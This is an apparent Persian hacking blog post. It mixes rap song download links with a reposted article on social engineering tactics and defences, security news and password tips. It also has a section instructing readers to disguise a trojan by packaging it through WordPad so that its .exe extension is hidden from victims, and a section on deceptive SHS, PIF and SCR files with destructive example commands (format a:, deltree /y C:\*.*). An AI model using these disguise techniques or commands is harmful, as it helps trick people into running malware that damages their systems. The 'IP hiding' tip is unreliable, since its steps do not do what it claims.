سلام به همه

امروز برای اینکه یه حالی بهتو بدم میخوام اول چند تا آهنگ رپ براتون بزارم بعد بریم سراغ آموزش هک

آهنگ ها رو به سلیقه خودم از بهترین ها تا بهتر ها ( چی گفتم !!! ) مزارم برای دانلود

اولی رو حتما حتما حتما دانلود کنید آهنگ زندگی سگی از شایا ( که به نظر من بهترین دختر رپ خونه )

دومی باز هم از شایا به نام هی رپر این هم خیلی با حاله من که خیلی باهاش حال کردم از اینجا دانلود کنید

باز هم از شایا با نام به یاد بیار این هم خیلی با حاله دانلود کنید

و باز هم از شایا به نام رفیق

واقعا شایا یکی از بهترین دختر های رپ خونه این هم از عکسش

و آخرين آهنگ از گروه ۱۳ خيلي با حاله به نام دوباره ۱۳ حتما دانلودش كنيد

آهنگ جدید از سروش سیدی بنام من پا برجام . سروش سیدی کسی هست که ادعا می کنه هیچکس واقعی هست ولی این قضیه صحت نداره و هیچکس واقعی سروش لشگری هست ولی آهنگ فوق العاده زیبا هست. حتما دانلود کنید. این هم عکس سروش سیدی ( هیچکس دروغین )

Download

راستي درباره سروش هيچكس قلابي چيزي ميدونيد اگه نميدونيد پس اينو دانلود كنيد

آهنگ زیبا اما یکم قدیمی از Akon كه با امينم فيت داده به نام Smack that  حتما دانلود كنيد

خب حالا براي آموزش هك روي ادامه مطلب كليك كنيد

ادامه ی مطلب ...

ممكن است شما يك تجهيزات ديواره آتش بسيار گران قيمتي بخريد. بهترين نرم افزار آنتي ويروس را نصب كرده باشيد و قوي ترين سيستم هاي كشف دخول سرزده (IDS ) را اضافه كرده باشيد اما هنوز نقطه ضعفي در طراحي امنيتي شما وجود دارد كه از آن چشم پوشي كرده ايد.

در اين مقاله قصد داريم كه درباره بعضي از تاكتيك هاي مهندسي اجتماعي (Social Engineering ) ، كه بسيار با اهميت نيز مي باشد بحث كنيم. در اين مقاله نحوه محافظت از نفوذگراني كه به وسيله سوءاستفاده از افراد و فريب آنها خيلي سريعتر در شبكه ما نفوذ مي كنند ،  بحث خواهد شد.

اگر كاربري از سازمان شما كه دسترسي مجازي روي شبكه دارد فريب بخورد و كلمه عبور خود را در اختيار يك كاربر غير مجاز بگذارد ، آنگاه تمامي روشهاي محافظت در برابر حملات بي فايده خواهد بود.

هر سارقي مي داند كه براي وارد شدن به يك ساختمان ، داشتن يك كليد ، خيلي بهتر از شكاندن قفل با ديلم و يا وارد شدن به زور از پنجره است.

در دنياي امنيت كامپيوتر به نحوه گرفتن اين كليد رمز ، «مهندسي اجتماعي‌» مي گويند. مهندسي اجتماعي نيازي به مسايل تكنيكي ندارد و بيشتر يك امر فردي مي باشد كه بستگي زيادي روي مهارت هاي فردي دارد. نفوذگر با استفاده از فريب و نيرنگ و يا ارعاب ، شخص را قانع مي كند كه پسورد و يا هر اطلاعات مفيد ديگري را در اختيار او قرار دهد.Kevin Mitnick كه يكي از ماهرترين نفوذگران در اين زمينه بود ( كه به همين دليل نيز دستگير شد) ، كتابي دارد به نام Controlling the Human of Security كه در آن به اين موضوع پرداخته است.

 مهندسي اجتماعي

مهندسي اجتماعي به صورت زير تعريف مي شود:

نوعي از دخول سرزده غير تكنيكي كه وابستگي زيادي به نحوه ارتباط افراد دارد و اغلب نيز با حيله گري انجام مي شود و باعث مي گردد كه بعضي از مسايل امنيتي در سازمان شكسته شود و يا لو رود.

بعضي از سناريو هاي مهندسي اجتماعي به صورت زير مي باشد:

-          به يكي از كاربران تلفن بزنيد و بگوييد كه من يكي از مديران بخش شبكه هستم و براي حل بعضي از مشكلات بخش شبكه، نياز به نام كاربري و كلمه رمز شما دارم.

-          به يكي از شركت هاي بخش آي تي زنگ بزنيد و وانمود كنيد كه يكي از مديران شركت مي باشيد و نام كاربري و كلمه رمز خود را گم كرده ايد و خيلي فوري به آن احتياج داريد.

-          با يكي از كارمندان بخش كامپيوتر سازمان طرح دوستي بريزيد و در يك مكالمه عشقي از او اطلاعات بخش امنيتي شركت را دريافت كنيد.

وقتي كه نفوذگر مهارت هاي مهندسي اجتماعي و مهارت هاي كامپيوتري را با هم دارد به راحتي مي تواند در هر شبكه اي نفوذ كند.

بيشتر درخواستهايي كه از طريق اينترنت و به خصوص پست الكترونيكي دريافت مي شود كه در آن از جانب مدير و يا يكي از كارمندان بانك و يا شركت هاي كارت اعتباري از كاربر خواسته شده است كه به فلان سايت بروند و در آنجا اطلاعات كاربري خود را وارد كنند ،( در سايتي كه مربوط به هكر مي باشد) اين نيز يكي از روشهاي مهندسي اجتماعي مي باشد.

بعضي از مهندسي هاي اجتماعي ، روي مطالب تحقيقاتي شركت ها مي باشد. چنين فعاليت هايي  به نام آشغال گردي (dumpster diving )  معروف هستند( يعني در آشغالها و كاغذ هاي كاري دور انداخته شده يك شركت به دنبال اطلاعات مفيد گشتن) كه اين هم مي تواند نوعي مهندسي اجتماعي باشد.

بعضي از هكر ها هم به صورت ماهرانه اي وانمود مي كنند كه مثلا آنها مسوول تعمييرات ساختمان هستند و يا اينكه به عنوان يك سرايدار در شركت شما استخدام شوند ، از آنجاييكه بيشتر كارمندان كارهاي خودشان را از راه دور انجام مي دهند بنابراين هيچگاه به كسي اجازه ندهيد كه به محل فيزيكي سايت كامپيوتر شما نزديك شود. يك هكر مصمم ممكن است كه روزها و يا هفته ها را صرف كند تا اعتماد يك كارمند را به دست آورد كه از راههاي مختلفي اين كار مي تواند انجام شود (مخصوصا براي ما ايراني ها كه هر روز با يك نفر در ياهو مسنجر دوست مي شويم! )

مهندسي اجتماعي معكوس  نيز يكي روشهايي مي باشد كه در آن نفوذگر بعضي از مشكلات را براي كامپيوتر كاربر ايجاد مي كند و خودش هم براي كمك مي آيد ( مانند اينكه يك نفر آتشي درست كند و خودش هم براي خاموش كردن آن كمك كند) . همين امر باعث مي شود كه اعتماد كاربر را سريع تر جلب كند و اطلاعات لازم را سريع تر از او بگيرد. براي مثال مهندس اجتماعي (نفوذگر) ممكن است كه ميلي به همراه تروجاني كه به آن ضميمه شده است براي كاربر مورد نظرش ارسال كند و چون كاربر ، مهندس را مي شناسد و به آن اعتماد دارد بدون اينكه درباره فايل ضميمه احتياط كند به راحتي فايل ضميمه شده را اجرا مي كند و يا حتي آن را براي ديگران نيز ارسال مي كند.

 چگونه شما مي توانيد در مقابل مهندسي اجتماعي ايمن شويد؟

دفاع در برابر مهندسي اجتماعي بايد به اندازه تمام تكنولوژيهاي امنيتي كه براي محافظت از شبكه اتان به كار مي بريد ، اهميت داشته باشد. اما متاسفانه معمولا اين نوع دفاع از طرف مديران شبكه رد مي شود. اينگونه فرض نكنيد كه كاربران خودشان بهتر مي دانند كه نبايد پسورد خود را به كس ديگري بدهند. علاوه بر آموزش كارمندان جزء ، حتي اعضاي تيم IT خود را كه روي امنيت سيستم هاي شما كار مي كنند نيز بايد آموزش ببينند.بيش از نيمي از كارمندان ، هيچ دليلي نمي بينند كه به فردي كه به نظر وجهه خوبي دارد پاسخ ندهند.  حتي حرفه اي ها هم وقتي به يك فرد خشمگين برخورد مي كنند كه مدعي هست از مديران رده بالاي شركت مي باشد و به سرعت نياز به اطلاعاتي دارد ، دو دل هستند كه از فرد بخواهند كارت شناسايي خود را نشان دهد.

 محافظت شبكه ها در برابر حملات مهندسي اجتماعي در درجه نخست ، به يك سري سياستهايي نياز دارد كه بايد بين تمامي افراد سازمان اجرا گردد. اين سياستها و روالها ، يك سري قوانيني براي پاسخگويي به سوالات مهم را به وجود مي آورد. البته فقط ابلاغ كردن اين سياستها كافي نمي باشد . موارد زير نيز بايد در نظر گرفته شود:

همه اعضاي مديريت بايد اين سياستها را بپذيرند و اين را بفهمند كه در هنگام خواستن كلمه عبور و يا اطلاعات مهم ديگر ، به طرز مناسبي ابتدا هويت خود را معرفي كنند.
اين سياستها بايد توسط تمامي اعضاي شبكه اجرا شود و به صورت مناسبي به آنها آموزش داده شود و دلايل اجراي اين سياستها نيز به آنها تفهيم گردد.
بايد با متخلفين و كساني كه از اين سياستها سرپيچي مي كنند برخورد كرد و مجازاتهايي براي اين تخلفات قرار داد.
 

سياستهاي امنيتي شما بايد شفاف باشد و موارد زير را نيز بايد شامل گردد:

سياستهاي كلمات رمز محكم: طول كوتاه، تغييرات كلمه رمز در طول يك مدت مشخص ، عدم استفاده از كلمات موجود در لغتنامه ها، كلمات رمز قابل حدس مانند شماره تلفن ، شماره شناسنامه و يا تاريخ تولد و ...
ممنوع كردن لو دادن پسورد : براي گرفتن كلمات عبور يكي از اعضاي سازمان ، البته فقط براي كسي كه به طور واقع به آن احتياج دارد، روالي در نظر گرفته شود .
كاربران هنگامي كه از كامپيوتر خود به مدت طولاني استفاده نمي كنند و يا آن را ترك مي كنند ، سيستم خود را log off كنند و از Screensaver هايي كه به وسيله كلمات عبور محافظت مي شود ، استفاده كنند.
يك مقداري هم امنيت فيزيكي در نظر گرفته شود تا مهمانان و بيگانگاني كه وارد شركت مي شوند ، به سيستم هاي داخلي دسترسي نداشته باشند.
يك روالي براي معرفي هويت كاربران به گروه IT و كاركنان بخش IT به كاربران معمولي مشخص گردد.
سياستهاي مديريتي انهدام كاغذهاي كاري (تكه تكه كردن ، خرد كردن، سوزاندن و ... ) ، ديسكها و ديگر رسانه هايي كه اطلاعاتي را نگهداري مي كنند قرار داده شود زيرا كه اين اطلاعات مي تواند به يك نفوذگر براي به دست گرفتن سيستم هاي ما كمك كند.
 

سياهه محافظت و پيشگيري در برابر مهندسي اجتماعي

براي اينكه از موفقيت يك مهندس اجتماعي در دستيابي به اطلاعاتي كه به آنها نياز دارد جلوگيري كنيم و يا اينكه وقوع يك مهندسي اجتماعي را كشف كنيم موارد زير را مي توان در نظر گرفت:

·         ابزارهاي شبكه و كامپيوترهاي خود را به صورت فيزيكي محافظت كنيد

·         سياستهاي امنيتي را در تمامي كاركنان سازمان گسترش دهيد و به صورت جزيي روشهاي مهندسي اجتماعي را به آنها معرفي كنيد.

·         به تمامي كاركنان سازمان نحوه شناختن مهندسان اجتماعي را آموزش دهيد

·         تمامي كاغذهاي اداري و رسانه هاي مغناطيسي را كه اطلاعات محرمانه اي را نگهداري مي كنند در جاي مناسبي بايگاني كنيد و پس از مدتي كه غير قابل استفاده شدند ، آنها را نابود كنيد.

يك تمرين خوب براي ايجاد يك پايگاه داده از انواع اين گونه حملات اين مي باشد كه تمامي حملات مهندسي اجتماعي كه در سازمان شما رخ داده است را در  جايي بايگاني كنيد و مكاني را براي هماهنگي و پاسخگويي و جمع آوري اين گونه حملات در سازمان ايجاد كنيد. براي مثال اگر به يكي از منشي ها تلفني زده مي شود از طرف فردي كه وانمود مي كند مدير بخش IT مي باشد ، بايد جايي وجود داشته باشد تا اين منشي گزارش اين تلفن را به آنجا ابلاغ كند. اين كار به شما امكان مي دهد كه با الگوهاي اينگونه حملات آشنا شويد و خودتان را براي آينده قوي تر كنيد و همين امر باعث مي شود كه شما بفهميد ، افرادي وجود دارند كه به اطلاعات شبكه شما نياز دارند و قصد دست يافتن بدانها را دارند.

 خلاصه

مهندسي اجتماعي يكي از ساده ترين و عمومي ترين راههاي نفوذ در شبكه هاي مي باشد. سازمانهاي بسياري وجود دارند كه براي امنيت شبكه خود پولهاي فراواني خرج مي كنند ولي هنوز حاضر نيستند براي مقابله با « سوءاستفاده از فاكتورهاي انساني» پولي خرج كنند.

ابتدا بايد براي پيشگيري از اين گونه حملات، سياستهايي را تدوين و اجرا كرد. اما مهمترين مرحله براي پيشگيري، آموزش كاركنان سازمان مي باشد.

امنيت اطلاعات بايد براي تمامي شركتهايي كه به نوعي از شبكه هاي كامپيوتري استفاده مي كنند ، بخش مهمي از برنامه هاي آنان باشد. بايد مراقب تمامي حملاتي باشيم كه عليه شبكه هاي ما اتفاق مي افتد به خصوص اگر به صورت «مهندسي اجتماعي» باشد.

تمامی کسانی که در هک اندکی نیز سر رشته دارند مطمئنأ میدانند وقتی یک تروجان ساخته میشود پسوند آن exe. است. این موضوع میتواند باعث شود که فرد مورد نظر تروجان را دریافت نکند. اکنون قصد داریم یک ترفند بسیار جالب را به شما معرفی کنیم که با استفاده از آن میتوانید این پسوند را کاملا متو سازید ، به نوعی که همچنان همان کارایی را داشته باشد.

بدین منظور:
از منوی Start و سپس All Programs وارد Accessories شده و Wordpad را انتخاب کنید.
پس از باز شدن برنامه Wordpad تروجان مورد نظر را Copy کرده و در درون Paste ، Wordpad نمایید.
تال از منوی بالا وارد Edit>Package Object>Edit Package شوید.
در پنجره باز شده از منوی Edit بر روی Copy Package کلیک کنید.
در پایان وارد یکی از درایو های کامپیوتر شده و راست کلیک کنید و Paste را انتخاب کنید.
فایلی که Paste میشود تروجان جدید شما بدون پسوند exe است

پرشین هک از ایسنا؛يك كارشناس امنيت شبكه: پشتيباني مهم‌ترين مرحله‌ي برقراري امنيت است
بي‌توجهي به امنيت كاربر به اخلال در امنيت رايانه‌يي مي‌انجامد
يك كارشناس امنيت شبكه گفت: امنيت رايانه‌يي كشور در گذشته، در سطح شبكه مطرح بود؛ به عنوان نمونه با ايجاد محدوديت در شبكه، امنيت برقرار مي‌كردند و در داخل اين محدوده اهميتي به كاربر داده نمي‌شد؛ اما در استراتژي امنيتي امروز، علاوه بر امنيت پيراموني، بايد به امنيت كاربر نيز توجه كرد؛ تا جايي‌كه سيستم هر كاربر به آنتي ويروس مجهز شود. محمد مصلايي در گفت‌وگو با خبرنگار سرويس فناوري اطلاعات خبرگزاري دانشجويان ايران (ايسنا)، درباره‌ي راه‌كارهاي امنيت رايانه‌يي در كشور، همچنين اظهار داشت: هفت عنصر در مباحث امنيتي رايانه‌يي شايان ذكر است؛ امنيت در سرويس، ظرفيت‌ها كه نشان‌دهنده‌ي توان سازمان براي برقراري امنيت است، حفظ سرويس كه نيازمند تداوم خدمات است، مديريت به عنوان چهارمين مورد كه هميشه بر امنيت سازمان نظارت داشته باشد. وي قابليت اعتماد و استاندارد بودن رويه‌هاي امنيتي را از ديگر عناوين برقراري امنيت در يك سازمان دانست و افزود: پشتيباني و برقراري ساختاري كه قابليت عملياتي نگه‌داشتن يك سيستم را داشته باشد، مهم‌ترين و آخرين مرحله‌ي برقراري امنيت است. مصلايي در پاسخ به اين سوال ‌كه امنيت رايانه‌يي بايد از چه مرحله‌اي آغاز شود، با اشاره به يك مدل استخراجي گفت: ابتدا بايد سازمان را در داخل و خارج به مناطق خاصي تقسيم‌بندي كرد، به گونه‌اي كه در داخل سازمان به طبقه‌بندي بلوك‌بندي شده برسيم و روي اين مناطق تعداد سطوح امنيتي مورد نياز را تعريف كنيم. او ادامه داد: در اين‌جا عدد صفر براي سطوحي است كه به امنيت نياز ندارند و در سطح يك نيز نياز به امنيت معمولي وجود دارد، اما سطح دو، به امنيتي محكم‌تر نيازمند است كه نبايد ارتباط معمولي با ساير مناطق برقرار كنند و سطح سه شامل مناطقي است كه داراي امنيت ملي هستند؛ اين چهار سطح را به نوعي به مناطق اختصاص مي‌دهيم و به يك طبقه‌بندي امنيتي دست پيدا مي‌كنيم. وي افزود: طبق اين طبقه‌بندي، در برخي سطوح به سمت ابزار نيز پيش مي‌رويم‌ و روي آن متدلوژي برقرار مي‌كنيم و از آن‌جا كه امنيت هدف نيست و يك فرآيند است و به همين دليل قابليت ارتقا دارد و شايد بهبود هزينه را نيز به همراه داشته باشد. وي تصريح كرد:‌ طبقه‌بندي در بودجه،‌ صرفه‌جويي خواهد كرد. مخابرات به عنوان تنها متولي اينترنت در كشور، اگر ترافيك ويروس را خود كنترل كند، هيچ ويروسي وارد فضاي تبادل اطلاعات كاربران نخواهد شد؛ اما مخابرات، ICP‌ها و ISP‌ها هيچ كدام مجهز به فيلتر ويروس نيستند. وي با تاكيد بر اين‌كه در استراتژي امنيتي جديد علاوه بر امنيت پيراموني، اهميت امنيت كاربران به ميزان قابل توجهي بالا رفته اما نيازمند حمايت است، گفت: ‌سيستم هر كاربر بايد به آنتي ويروس مجهز شود و با طي اين مرحله به سطح صفر يا يك رسيديم و اگر كاربر را فراموش كنيم، روال امنيتي درست از آب در نخواهد آمد

«استیو باس» نویسنده‌ی سایت PCWorld در مقاله‌ای درباره‌ی رمز عبور سخن گفته است. در بخشی از این مقاله می‌خوانیم: «بدترین رمز عبور، رمز عبوری است که نام دوست، فامیل، حیوان و یا حتی نشانی منزل باشد.» همچنین وی از تجارب خویش در این باره می‌گوید که چگونه چندین‌بار به دلیل استفاده از یک رمز عبور ساده، به دردسر افتاده است.

وی در بخشی از این مقاله توصیه‌ای مهم دارد: «هر چند وقت یک‌بار رمز عبورهای مهم خود را عوض کنید. در رمز عبور خود از حروف، اعداد و نشانه‌ها استفاده کنید. از حروف بزرگ و کوچک بهره ببرید.»

اما چگونه یک رمز عبور خوب بسازیم؟ «استیو باس» می‌گوید: «ما معمولا نمی‌توانیم رمز عبور خوبی بسازیم؛ اما برنامه‌ها این کار را انجام می‌دهند. مثلا برنامه‌ی سایت راهنمای ویندوز که در نشانی http://www.winguides.com/security/password.php قابل دسترسی است، پیشنهاد خوبی است. خود من از روبوفرم استفاده می‌کنم که در نشانی http://www.roboform.com قرار دارد. همچنین برنامه‌هایی هستند که باعث عدم ذخیره‌ی رمز عبور شما در رایانه‌های مختلف می‌شوند که امنیت رمز عبور شما را بالاتر می‌برند.»

در صورتی که تنها سررشته ای از هک و امنیت را داشته باشید میدانید که بسیاری از هکرها برای نفوذ به سیستم قربانی از IP او استفاده می کنند. با استفاده از این ترفند می توانید کاری کنید که IP شما برای همیشه دور از دسترس این افراد باشد و به نوعی به طور کامل IP خودتان را از دسترس دیگران مخفی نگه دارید.




برای این کار:
1- ابتدا از منوی Start به Run رفته و در محیط Run عبارت MMC را تایپ نمایید.
2- در محیط جدید ، از منوی File به قسمت Add/Remove Snap-in بروید.
3- در پنجره باز شده بر روی دکمه Add کلیک کنید.
4- در پنجره جدید ، بر روی IP Security Policy Management کلیک کرده و دکمه Add را بزنید.
5- سپس Finish را زده و خارج شوید.
6- در پنجره قبلی بر روی Ok کلیک کنید.
7- حال در همان محیط اولیه هستید.آیکون کناری عبارت IP Security Policy Management زرد رنگ است. اکنون میبایست یکبار بر روی آن کلیک کنید تا رنگ آن به سبز تغییر پیدا کند.
8- در پایان از منوی File به Exit رفته و با انتخاب yes این عملیات را ذخیره کنید

هر هکر حرفه ای میدونه که مهندسی اجتماعی تو کار هک چه قدر مهمه

ما هیچگاه نمیتوانیم شبکه های خود را کاملا" ایمن کنیم اما اگر هم روزی بخواهیم به منطق 99.9% ایمنی برسیم نمیتوانیم عامل انسان را از چک لیست های تست امنیتی خود حذف کنیم . علوم مهندسی اجتماعی یک هنر است و یاد گیری این هنر برای کلیه کارمندان و مدیران سازمان ها ضرورت دارد تا افشای اطلاعات از طریق عامل انسان را به صفر برسانند . در این مقاله به بررسی علمی تفکرات انسان تا تکنیک هایی که متخصصان نفوذ در کار های خود برای تحریک اشخاص به کار میگیرند همراه با مثال های جامع پرداخته میشود .اگر با این علم در هیچ حدی آشنایی ندارید پس جالب است بدانید مهاجمین خبره قادرند بدون هیچ گونه تماس فیزیکی , به اطلاعات و مستندات حساس شما دسترسی پیدا کنند . آنها با وانمود کردن خود به عنوان یکی از کارمندان دیگر شعب , شرکا و یا حتی کارمند بخش های داخلی سازمان , تلاش میکنند تا با اغفال افراد و تحریکآنها با تکنیک های خاص خود که به توضیح مفصل در مورد آن خواهم پرداخت بپردازند . مهندسی اجتماعی تنها در علوم کامپیوتر و سازمان های کامپیوتری کاربرد ندارد , خود شما روزانه شاید چندین بار از آن برای پیشبرد اهداف خود استفاده نمایید چه در کار های روزمره و برخورد با اشخاص و چه در هنگامی که برای اولین بار به یک سازمان یا هر مکانی دیگری برای انجام کاری همچون شرکت در مناقصات یا خرید خودرو میروید اما هدف شما از بهره گیری مهندسی اجتماعی سواستفاده نبوده و صرفا" قصد پیشبرد سریعتر کار های خود را دارید . مهاجمین همیشه با اهداف از پیش تعریف شده و آگاهی کامل اقدام به ایجاد یک تماس تلفنی یا انجام یک رابطه فیزیکی با شخص مورد نظرشان مینمایند که در این برخورد هاآنها خود را یکی از مدیران , کارمندان,  کارفرمایان و... معرفی میکنند و بعد از ایجاد اطمینان اقدام به سرقت نام های کاربری و رمز عبور یا هر اطلاعات مهم دیگری میکنند . حقیقتا" این علم بسیار فرا تر از مقاله ای میباشد که در جلوی شما قرار دارد و تمام گستردگی این علوم در تجارب و برخورد هایی که شما باآنها مواجه خواهید شد نهفته است . بسیاری از شرکت ها و موسسات بزرگ همچون بانک ها و سازمان های دولتی از آموزش این علوم و بیان اهمیت آن به کارمندان خود صرف نظر میکنند اماآنها میبایست آگاه باشند که میتوانند با هزینه ای کاملا" ناچیز جلوی مشکلات و ضرر هایی را که در آینده گریبان گیر آنان خواهد شد را بگیرند . آیا ما میتوانیم منکر گزارشات وخیم سال 2004 سازمان InfoSecurity اروپا شویم ؟

یک شخص با قابلیت مهندسی اجتماعی کیست ؟

انواع مهندسین اجتماعی

روان شناسی اجتماعی در کل هفت نوع عامل ایجاد تحریک را تعریف میکند

•        حس انطباق پذیری

•        منطق و استدلال

•        نیاز و احساسات

•        اعتبارات و ترس

•        مساعدت هدفمند

•        شباهت کاذب

•        مانوراطلاعاتی

ویژگی های یک مهندس اجتماعی موفق

•         بردباری

دانلود مقاله

افشاي هكرها هدف ما اين است كه با افشاي “ترفندهاي هكر” استفاده كنندگان از اينترنت با دانش و ابزارهاي مورد نياز، آمادگي بهتري پيدا كنند تا فريب ترفندهاي هكر را نخورند. پسوندهاي پنهان فايلهاي ويندوز ممكن است از اين موضوع آگاهي نداشته باشيد، اما حتي اگر به ويندوز بگوييد كه تمام پسوندهاي فايل را نشان دهد، هنوز هم فايلهايي وجود دارند كه بطور پيش فرض مخفي شده‌اند. همچنين هر برنامه نصب شده‌ايي مي‌تواند پسوندها را پيكربندي كند تا پنهان شوند. در اينجا در مورد چگونگي انجام اين كار و همچنين دليل اينكه چرا برخي از پسوندهاي پنهان مي‌توانند براي تعدادي از كاربرهاي كامپيوتر خطرناك باشند، مثالهايي آورده شده است. به فرض اينكه شما قبلا ويندوز explorer را براي نشان دادن تمام پسوندهاي پيكربندي كرده‌ايد. پسوندهاي SHS يك كپي از notepad.exe بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد. روي notepad.exe كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي notepad.exe كليك كنيد و آن را به عقب به سمت desktop بكشيد. فايلي را كه ايجاد شده است (Scrap) به Readme.txt تغيير نام دهيد. حالايك آيكن كه نشان دهنده سند متني است و فايلي با نام مشخص readme.txt بر روي desktop شما وجود دارد كليك كردن بر روي فايل فوق باعث مي‌شود notepad باز ‌شود. اگر اين فايل يك Trojan باشد، شما فريب خورده‌ايد و توسط آنچه كه يك فايل متني بي‌خطر بنظر مي‌رسيد آلوده شده‌ايد. اگر اجازه نمايش اين پسوند داده مي شد شما فريب فايل Readme.txt.shs را نمي‌خورديد. پسوندهاي PIF اگر سعي كنيد تا notepad.exe را به anything.txt.pif تغيير نام دهيد، تنها فايلي با نام anything.txt روي desktop خود خواهيد ديد. و اين بدين دليل است كه PIF پسوند ديگري است كه ويندوز بطور پيش فرض پنهان مي‌كند. اگر شما فايل را اجرا كنيد برنامه اجرا خواهد شد، به خاطر اينكه ويندوز پسوندهاي PIF را اجرا خواهد كرد حتي اگر آنها فايلهاي اجرايي باشند. پسوندهاي SCR پسوند ديگري كه بايد مراقب آن بود SCR است. كپي notepad.exe خود را به notepad.scr تغيير نام دهيد و روي آن كليك كنيد. Notepad به عنوان يك فايل اجرايي اجرا خواهد شد. بسياري از افراد توسط هكرهايي فريب مي‌خورند كه account يك قرباني را بدست آورده‌اند. هكر email يا هر نوع پيغامي را به تمام دوستان قرباني مي‌فرستد كه "اين صفحه نمايش جديد و بامزه را ببينيد از خنده روده بر خواهيد شد!" از آنجايي كه اين پيغام از يك منبع مطمئن آمده، اكثر افراد فريب خورده و فايل SCR را اجرا مي‌كنند كه در نهايت به هكري ختم مي‌شود كه به كامپيوتر شما متصل شده است. فرمانهاي خطرناكي كه مي‌توانند گنجانده شوند پسوندهاي ميانبر PIF برخي از پسوندهاي پنهان فايل قادرند به سادگي با فرمانهاي پنهان شده‌اي كه مي‌توانند براي سيستم شما مخرب باشند برنامه‌ريزي شوند. اين يك آزمايش ساده است: دكمه راست ماوس خود را روي desktop كليك كنيد و New و سپس Shotcut را انتخاب نماييد. در Command line تايپ كنيد: format a:/autotest Next را كليك كنيد. در "Select a name for the shortcut" تايپ كنيد: readme.txt سپس Next را كليك كنيد. يك آيكن notepad را انتخاب كرده و Finish را كليك كنيد. حالا شما در desktop خود فايلي با نام readme.txt و با آيكن notepad داريد. مطمئن شويد كه در درايو شما ديسكي است كه از دست دادن آن براي شما اشكالي ندارد و روي آيكن كليك كنيد. فايلي كه شما روي آن كليك كرده‌ايد درايو A: را فرمت خواهد كرد. البته آيكن هكر درايو ديگري را مورد هدف قرار خواهد داد يا ممكن است نامي همچون ‘game.exe’ و فرماني براي حذف كردن دايركتوري ويندوز شما يا (deltree /y C:\*.*) كل درايو C شما داشته باشد. اگر پسوند PIF پنهان نشود، قادر به فريب شما نخواهد بود. پسوند SHS فايلهاي Scrap نيز مي‌توانند فرمانهاي گنجانده شده را پنهان كند. اين يك آزمون ساده است: از notepad.exe يك كپي بگيريد و آن را روي desktop خود قرار دهيد. Wordpad را باز كنيد.Notepad.exe را كليك كنيد و آن را به سمت سند باز شده wordpad بكشيد. روي Edit كليك كنيد و Package Object و سپس Edit package را انتخاب كنيد. روي Edit و سپس Command Line كليك كنيد. در كادر، دستوري مانند format a:/autotest را تايپ كنيد و روي OK كليك كنيد. آيكن نيز مي‌تواند از اين پنجره تغيير يابد. از پنجره خارج شويد، اين كار سند را به روز خواهد كرد. روي notepad.exe كليك كنيد و آن را به عقيب به سمت Desktop بكشيد. فايلي را كه ايجاد شده (Scrap) به Readme.txt تغيير نام دهيد. حالا شما آنچه را كه شبيه يك فايل متني است داريد. اگر اين فايل اجرا شود درايو A: را فرمت خواهد كرد. همانگونه كه در مثال بالا براي پسوندهاي ميانبر PIF ديده شد، هكر مي‌تواند از فرمانهاي خطرناكتري استفاده كند. روشهاي Trojan در هنگام راه اندازي روشهاي راه اندازي استاندارد اكثر افراد از راههاي متفاوتي كه هكرها براي راه اندازي فايلهاي Trojan استفاده مي‌كنند آگاه نيستند. اگر هكري كامپيوتر شما را با يك Trojan آلوده كند، نياز به انتخاب يك روش راه‌اندازي خواهد داشت، بگونه‌اي كه در زمان راه‌اندازي مجدد كامپيوتر شما Trojan بارگذاري شود. روشهاي معمول راه‌اندازي شامل كليدهاي اجرايي registry، فولدر راه اندازي ويندوز، Windows Load= يا run=lines يافته شده در فايل win.ini و shell=line يافته شده در system.ini ويندوز مي‌باشند. روشهاي راه اندازي خطرناك از آنجايي كه فقط تعداد اندكي از اين روشهاي راه اندازي وجود دارند، هكرهاي زيادي را يافته‌ايم كه در پيدا كردن روشهاي جديد راه‌اندازي افراط مي‌كنند. اين شامل استفاده از تغييرات خطرناكي در سيستم registry مي‌باشد، كه در صورتي كه فايل Trojan يا فايل همراه آن از بين برود سيستم را بصورت بلااستفاده درخواهد آورد. اين يك دليل استفاده نكردن از نرم افزار ضد ويروس براي از بين بردن Trojanهاست. اگر يكي از اين روشها استفاده شود، و فايل بدون ثابت كردن registry سيستم از بين برود، سيستم شما قادر به اجراي هيچگونه برنامه‌اي پس از راه اندازي مجدد كامپيوترتان نخواهد بود. قبل از آنكه سراغ registry برويم لازم به توضيح است كه يك فولدر به صورت C:\WINDOWS\StartMenu\Program\StartUp وجود دارد كه هر فايلي در اينجا باشد هنگام راه اندازي ويندوز اجرا خواهد شد.توجه داشته باشيد كه هرگونه تغييري مي‌تواند سيستم شما را به خطر بياندازد بنابراين، هرچه ما مي‌گوييم انجام دهيد. براي دستيابي به registry به منوي start>run> برويد و "regedit" را بدون علامت " " تايپ كنيد. در registry چندين مكان براي راه اندازي Startup وجود دارد كه ليستي از آنها را در اينجا مي آوريم. [HKEY_CLASSES_ROOT\exefile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\comfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\batfile\shell\open\command] ="\"%1\" %*" [HKEY_CLASSES_ROOT\htafile\Shell\Open\Command]="\"%1\" %*" [HKEY_CLASSES_ROOT\piffile\shell\open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\batfile\shell\ open\command] ="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\comfile\shell\ open\command]="\"%1\" %*" [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\ open\command]="\"%1\"%*" [HKEY_LOCAL_MACHINE\Software\CLASSES\htafile\Shell\ Open\Command]="\"%1\"%*" [HKEY_LOCAL_MACHINE\Software\CLASSES\piffile\shell\ open\command]="\"%1\"%*" اگر اين كليدها مقدار "\"%1\"%*" را نداشته باشند و به جاي اجراي فايل در هنگام راه اندازي به "\"Server.exe %1\" %*" تغيير يابد به احتمال زياد يك Trojan است. روش راه اندازي ICQ روشي راه اندازي ديگري كه امروزه استفاده از آن معمول است شناسايي شبكه ICQ مي‌باشد. بسياري از كاربران ICQ نمي‌دانند كه هكر مي‌تواند يك خط پيكربندي را به ICQ اضافه نمايد تا با هر بار بارگذاري شدن برنامه Trojan نيز راه اندازي شود. به عنوان آزمايش مراحل زير را انجام دهيد: ICQ را باز كنيد. روي آيكن ICQ كليك كنيد و preference را انتخاب نماييد. روي Edit launch List كليك كنيد. روي Add كليك كنيد. روي Browse كليك كنيد. فايلي را براي اضافه كردن به Windows\notepad.exe بيابيد كه به كار اين آزمايش بيايد. روي Open و سپس OK كليك كنيد. زماني كه شما ICQ 